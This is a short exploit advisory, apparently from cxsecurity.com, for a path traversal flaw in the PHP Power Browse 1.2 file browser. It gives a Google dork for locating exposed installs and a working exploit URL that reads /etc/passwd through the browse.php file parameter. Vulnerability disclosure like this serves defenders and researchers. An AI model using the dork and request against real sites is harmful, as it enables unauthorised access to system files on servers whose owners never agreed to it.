PHP Power Browse 1.2 Path Traversal

Published
Credit
Risk
2016.08.06
Manuel Mancera
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes
Dork: intitle:PHP Power Browse inurl:browse.php

# Exploit Title: PHP Power Browse v1.2 - Path Traversal
# Google Dork:
intitle:PHP Power Browse inurl:browse.php
# Exploit Author: Manuel Mancera (sinkmanu) | sinkmanu (at) gmail
(dot) com
# Software URL: https://github.com/arzynik/PHPPowerBrowse
# Version: 1.2
# Vulnerability Type : Path traversal
# Severity : High

### Description ###

This file browser is vulnerable to path traversal and allow to an
attacker to access to files and directories that are stored outside the
web root folder.

### Exploit ###

http://site/browse.php?p=source&file=/etc/passwd


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com